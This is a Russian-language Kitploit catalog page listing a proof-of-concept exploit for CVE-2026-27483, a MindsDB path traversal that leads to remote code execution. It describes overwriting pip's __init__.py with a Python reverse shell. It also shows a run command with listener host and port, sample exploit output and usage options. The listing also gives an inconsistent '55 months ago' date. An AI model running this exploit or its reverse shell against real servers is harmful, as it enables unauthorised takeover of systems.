Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-27483 — MindsDB — PoC обхода пути (Path Traversal), ведущего к RCE | Kitploit
Инструменты/GitHubGitHub/thewhiteh4t/cve-2026-27483
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

MindsDB — PoC обхода пути (Path Traversal), ведущего к RCE

Репозиторий
55 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27483

PoC: Path Traversal до RCE в MindsDB

Этот PoC-скрипт основан на следующем уведомлении о безопасности GitHub

  • По умолчанию MindsDB не использует аутентификацию
  • PoC поддерживает оба режима: неаутентифицированный и аутентифицированный
  • Мы можем запросить /api/handlers/, чтобы найти доступные обработчики; используйте имя любого доступного, но не установленного обработчика
  • PoC перезаписывает /venv/lib/python3.10/site-packages/pip/__init__.py
  • Python-реверс-шелл записывается по указанному выше пути, а затем запускается
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

Зависимости

root@kitploit:~
pip3 install requests packaging

Использование

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
Скачать инструмент